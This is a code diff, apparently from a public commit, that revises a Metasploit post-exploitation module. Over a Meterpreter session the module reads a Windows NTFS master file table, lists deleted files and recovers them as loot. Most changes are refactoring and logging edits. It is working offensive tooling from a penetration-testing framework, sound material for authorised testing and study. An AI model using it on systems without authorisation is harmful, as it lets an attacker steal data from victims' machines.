@@ -11,20 +11,27 @@ class Metasploit3 < Msf::Post
11
11
12
12
def initialize ( info = { } )
13
13
super ( update_info ( info ,
14
- 'Name' => 'Windows Gather Recovery Files' ,
15
- 'Description' => %q{
16
- This module list and try to recover deleted files from NTFS file systems.} ,
17
- 'License' => MSF_LICENSE ,
18
- 'Platform' => [ 'win' ] ,
19
- 'SessionTypes' => [ 'meterpreter' ] ,
20
- 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ] ,
21
- 'References' => [
14
+ 'Name' => 'Windows Gather Deleted Files Enumeration and Recovering' ,
15
+ 'Description' => %q{
16
+ This module list and try to recover deleted files from NTFS file systems. Use
17
+ the FILES option to guide recovery. Let it empty to enumerate deleted files in the
18
+ DRIVE. Set FILES to an extension (Ex. "pdf") to recover deleted files with that
19
+ extension. Or set FILES to a comma separated list of IDs (from enumeration) to
20
+ recover those files. The user must have into account file enumeration and recovery
21
+ could take a long time, use the TIMEOUT option to abort enumeration or recovery by
22
+ extension after that time (in seconds).
23
+ } ,
24
+ 'License' => MSF_LICENSE ,
25
+ 'Platform' => [ 'win' ] ,
26
+ 'SessionTypes' => [ 'meterpreter' ] ,
27
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ] ,
28
+ 'References' => [
22
29
[ 'URL' , 'http://www.youtube.com/watch?v=9yzCf360ujY&hd=1' ]
23
30
]
24
31
) )
25
32
register_options (
26
33
[
27
- OptString . new ( 'FILES' , [ false , 'ID or extensions of the files to recover in a comma separated way.' , "" ] ) ,
34
+ OptString . new ( 'FILES' , [ false , 'ID or extensions of the files to recover in a comma separated way. Let empty to enumerate deleted files. ' , "" ] ) ,
28
35
OptString . new ( 'DRIVE' , [ true , 'Drive you want to recover files from.' , "C:" ] ) ,
29
36
OptInt . new ( 'TIMEOUT' , [ true , 'Search timeout. If 0 the module will go through the entire $MFT.' , 3600 ] )
30
37
] , self . class )
@@ -51,7 +58,7 @@ def run
51
58
return
52
59
end
53
60
54
- print_status ( "Drive : #{ drive } OS : #{ winver } " )
61
+ print_status ( "System Info - OS : #{ winver } , Drive : #{ drive } " )
55
62
type = datastore [ 'FILES' ]
56
63
files = type . split ( ',' )
57
64
# To extract files from its IDs
@@ -68,14 +75,14 @@ def run
68
75
handle = get_mft_info ( drive )
69
76
if handle != nil
70
77
data_runs = mft_data_runs ( handle )
71
- print_status ( "It seems that MFT is fragmented (#{ data_runs . size -1 } data runs)" ) if ( data_runs . count > 2 )
78
+ vprint_status ( "It seems that MFT is fragmented (#{ data_runs . size -1 } data runs)" ) if ( data_runs . count > 2 )
72
79
to = ( datastore [ 'TIMEOUT' ] . zero? ) ? nil : datastore [ 'TIMEOUT' ]
73
80
begin
74
81
::Timeout . timeout ( to ) do
75
82
deleted_files ( data_runs [ 1 ..-1 ] , handle , files )
76
83
end
77
84
rescue ::Timeout ::Error
78
- print_error ( "Server timed out after #{ to } seconds. Skipping..." )
85
+ print_error ( "Timed out after #{ to } seconds. Skipping..." )
79
86
end
80
87
end
81
88
end
@@ -98,8 +105,8 @@ def recover_file(offset,handle)
98
105
rf = client . railgun . kernel32 . ReadFile ( handle , 1024 , 1024 , 4 , nil )
99
106
attributes = rf [ 'lpBuffer' ] [ 56 ..-1 ]
100
107
name = get_name ( attributes )
101
- print_status ( "File to download: #{ name } } " )
102
- print_status ( "Getting Data Runs ..." )
108
+ print_status ( "File to download: #{ name } " )
109
+ vprint_status ( "Getting Data Runs ..." )
103
110
data = get_data_runs ( attributes )
104
111
if data == nil or name == nil
105
112
print_error ( "There were problems to recover the file: #{ name } " )
@@ -110,32 +117,31 @@ def recover_file(offset,handle)
110
117
if data [ 0 ] == 0
111
118
print_status ( "The file is resident. Saving #{ name } ... " )
112
119
path = store_loot ( "resident.file" , "application/octet-stream" , session , data [ 1 ] , name . downcase , nil )
113
- print_good ( "File saved: #{ name . downcase } " )
120
+ print_good ( "File saved on #{ path } " )
114
121
115
122
# If file no resident
116
123
else
117
- path = store_loot ( "nonresident.file" , "application/octet-stream" , session , nil , name . downcase , nil )
118
-
119
124
# Due to the size of the non-resident files we have to store small chunks of data as we go through each of the data runs
120
- # that make up the file (save_file function). That's way we use store_loot and File.Open in append mode.
121
- file = File . open ( path , "ab" )
125
+ # that make up the file (save_file function).
122
126
size = get_size ( rf [ 'lpBuffer' ] [ 56 ..-1 ] )
123
127
print_status ( "The file is not resident. Saving #{ name } ... (#{ size } bytes)" )
124
128
base = 0
125
129
# Go through each of the data runs to save the file
130
+ file_data = ""
126
131
1 . upto ( data . count -1 ) { |i |
127
132
datarun = get_datarun_location ( data [ i ] )
128
133
base = base +datarun [ 0 ]
129
- size = save_file ( [ base , datarun [ 1 ] ] , size , file , handle )
134
+ size = save_file ( [ base , datarun [ 1 ] ] , size , file_data , handle )
130
135
}
131
- file . close
132
- print_good ( "File saved: #{ name . downcase } " )
136
+ #file.close
137
+ path = store_loot ( "nonresident.file" , "application/octet-stream" , session , file_data , name . downcase , nil )
138
+ print_good ( "File saved on #{ path } " )
133
139
end
134
140
}
135
141
end
136
142
137
143
# Save the no resident file to disk
138
- def save_file ( datarun , size , file , handle )
144
+ def save_file ( datarun , size , file_data , handle )
139
145
ra = file_system_features ( handle )
140
146
bytes_per_cluster = ra [ 'lpOutBuffer' ] [ 44 , 4 ] . unpack ( "V*" ) [ 0 ]
141
147
distance = get_high_low_values ( datarun [ 0 ] *bytes_per_cluster )
@@ -144,19 +150,19 @@ def save_file(datarun,size,file,handle)
144
150
buffer_size = 8
145
151
division = datarun [ 1 ] /buffer_size
146
152
rest = datarun [ 1 ] %buffer_size
147
- print_status ( "Number of chunks: #{ division } Rest: #{ rest } clusters Chunk size: #{ buffer_size } clusters " )
153
+ vprint_status ( "Number of chunks: #{ division } Rest: #{ rest } clusters Chunk size: #{ buffer_size } clusters " )
148
154
if ( division > 0 )
149
155
1 . upto ( division ) { |i |
150
156
if ( size >bytes_per_cluster *buffer_size )
151
157
rf = client . railgun . kernel32 . ReadFile ( handle , bytes_per_cluster *buffer_size , bytes_per_cluster *buffer_size , 4 , nil )
152
- file . write ( rf [ 'lpBuffer' ] )
158
+ file_data << rf [ 'lpBuffer' ]
153
159
size = size - bytes_per_cluster * buffer_size
154
- print_status ( "Save 1 chunk of #{ buffer_size *bytes_per_cluster } bytes, there are #{ size } left" )
160
+ vprint_status ( "Save 1 chunk of #{ buffer_size *bytes_per_cluster } bytes, there are #{ size } left" )
155
161
# It's the last datarun
156
162
else
157
163
rf = client . railgun . kernel32 . ReadFile ( handle , bytes_per_cluster *buffer_size , bytes_per_cluster *buffer_size , 4 , nil )
158
- file . write ( rf [ 'lpBuffer' ] [ 0 ..size -1 ] )
159
- print_status ( "Save 1 chunk of #{ size } bytes" )
164
+ file_data << rf [ 'lpBuffer' ] [ 0 ..size -1 ]
165
+ vprint_status ( "Save 1 chunk of #{ size } bytes" )
160
166
end
161
167
}
162
168
end
@@ -166,13 +172,13 @@ def save_file(datarun,size,file,handle)
166
172
if ( size <rest *bytes_per_cluster )
167
173
rf = client . railgun . kernel32 . ReadFile ( handle , rest *bytes_per_cluster , rest *bytes_per_cluster , 4 , nil )
168
174
# Don't save the slack space
169
- file . write ( rf [ 'lpBuffer' ] [ 0 ..size -1 ] )
170
- print_status ( "(Last datarun) Save 1 chunk of #{ size } " )
175
+ file_data << rf [ 'lpBuffer' ] [ 0 ..size -1 ]
176
+ vprint_status ( "(Last datarun) Save 1 chunk of #{ size } " )
171
177
else
172
178
rf = client . railgun . kernel32 . ReadFile ( handle , bytes_per_cluster *rest , bytes_per_cluster *rest , 4 , nil )
173
- file . write ( rf [ 'lpBuffer' ] )
179
+ file_data << rf [ 'lpBuffer' ]
174
180
size = size - bytes_per_cluster * rest
175
- print_status ( "(No last datarun) Save 1 chunk of #{ rest *bytes_per_cluster } , there are #{ size } left" )
181
+ vprint_status ( "(No last datarun) Save 1 chunk of #{ rest *bytes_per_cluster } , there are #{ size } left" )
176
182
end
177
183
end
178
184
return size
@@ -212,18 +218,18 @@ def go_over_mft(logc,offset,handle,files)
212
218
# If FILE header and deleted file (\x00\x00)
213
219
rf = client . railgun . kernel32 . ReadFile ( handle , 1024 , 1024 , 4 , nil )
214
220
if ( rf [ 'lpBuffer' ] [ 0 , 4 ] =="\x46 \x49 \x4c \x45 " ) and ( rf [ 'lpBuffer' ] [ 22 , 2 ] == "\x00 \x00 " )
215
- name = get_name ( rf [ 'lpBuffer' ] [ 56 ..-1 ] )
216
- if name != nil
217
- print_status ( "Name: #{ name } ID: #{ logc } " )
218
- # If we want to save it according to the file extensions
219
- if files != "" and files . include? File . extname ( name . capitalize ) [ 1 ..-1 ]
220
- print_good ( "Hidden file found!" )
221
- recover_file ( [ logc . to_s ] , handle )
222
- dist = get_high_low_values ( logc +1024 )
223
- # We need to restore the pointer to the current MFT entry
224
- client . railgun . kernel32 . SetFilePointer ( handle , dist [ 0 ] , dist [ 1 ] , 0 )
225
- end
226
- end
221
+ name = get_name ( rf [ 'lpBuffer' ] [ 56 ..-1 ] )
222
+ if name != nil
223
+ print_status ( "Name: #{ name } ID: #{ logc } " )
224
+ # If we want to save it according to the file extensions
225
+ if files != "" and files . include? File . extname ( name . capitalize ) [ 1 ..-1 ]
226
+ print_good ( "Hidden file found!" )
227
+ recover_file ( [ logc . to_s ] , handle )
228
+ dist = get_high_low_values ( logc +1024 )
229
+ # We need to restore the pointer to the current MFT entry
230
+ client . railgun . kernel32 . SetFilePointer ( handle , dist [ 0 ] , dist [ 1 ] , 0 )
231
+ end
232
+ end
227
233
# MFT entry with no FILE '\x46\x49\x4c\x45' header or its not a deleted file (dir, file, deleted dir)
228
234
else
229
235
logc = logc + 1024
@@ -246,7 +252,7 @@ def deleted_files(data_runs,handle,files)
246
252
0 . upto ( data_runs . size - 1 ) { |i |
247
253
datar_info = get_datarun_location ( data_runs [ i ] )
248
254
base = base +datar_info [ 0 ]
249
- print_status ( "MFT data run #{ i +1 } is at byte #{ base *bytes_per_cluster } . It has a total of #{ datar_info [ 1 ] } clusters" )
255
+ vprint_status ( "MFT data run #{ i +1 } is at byte #{ base *bytes_per_cluster } . It has a total of #{ datar_info [ 1 ] } clusters" )
250
256
# Add to the beginning
251
257
real_loc . unshift ( [ base *bytes_per_cluster , ( bytes_per_cluster *datar_info [ 1 ] ) /1024 ] )
252
258
}
@@ -287,12 +293,12 @@ def get_mft_info(drive)
287
293
bytes_per_cluster = ra [ 'lpOutBuffer' ] [ 44 , 4 ] . unpack ( "V*" ) [ 0 ]
288
294
mft_logical_offset = ra [ 'lpOutBuffer' ] [ 64 , 8 ] . unpack ( "V*" ) [ 0 ]
289
295
offset_mft_bytes = mft_logical_offset * bytes_per_cluster
290
- print_status ( "Logical cluster : #{ ra [ 'lpOutBuffer' ] [ 64 , 8 ] . unpack ( 'h*' ) [ 0 ] . reverse } " )
291
- print_status ( "NTFS Volumen Serial Number: #{ ra [ 'lpOutBuffer' ] [ 0 , 8 ] . unpack ( 'h*' ) [ 0 ] . reverse } " )
292
- print_status ( "Bytes per Sector: #{ ra [ 'lpOutBuffer' ] [ 40 , 4 ] . unpack ( 'V*' ) [ 0 ] } " )
293
- print_status ( "Bytes per Cluster: #{ bytes_per_cluster } " )
294
- print_status ( "Length of the MFT (bytes): #{ ra [ 'lpOutBuffer' ] [ 56 , 8 ] . unpack ( 'Q*' ) [ 0 ] } " )
295
- print_status ( "Logical cluster where MTF starts #{ mft_logical_offset } " )
296
+ vprint_status ( "Logical cluster : #{ ra [ 'lpOutBuffer' ] [ 64 , 8 ] . unpack ( 'h*' ) [ 0 ] . reverse } " )
297
+ vprint_status ( "NTFS Volumen Serial Number: #{ ra [ 'lpOutBuffer' ] [ 0 , 8 ] . unpack ( 'h*' ) [ 0 ] . reverse } " )
298
+ vprint_status ( "Bytes per Sector: #{ ra [ 'lpOutBuffer' ] [ 40 , 4 ] . unpack ( 'V*' ) [ 0 ] } " )
299
+ vprint_status ( "Bytes per Cluster: #{ bytes_per_cluster } " )
300
+ vprint_status ( "Length of the MFT (bytes): #{ ra [ 'lpOutBuffer' ] [ 56 , 8 ] . unpack ( 'Q*' ) [ 0 ] } " )
301
+ vprint_status ( "Logical cluster where MTF starts #{ mft_logical_offset } " )
296
302
# We set the pointer to the begining of the MFT
297
303
client . railgun . kernel32 . SetFilePointer ( r [ 'return' ] , offset_mft_bytes , 0 , 0 )
298
304
return r [ 'return' ]
0 commit comments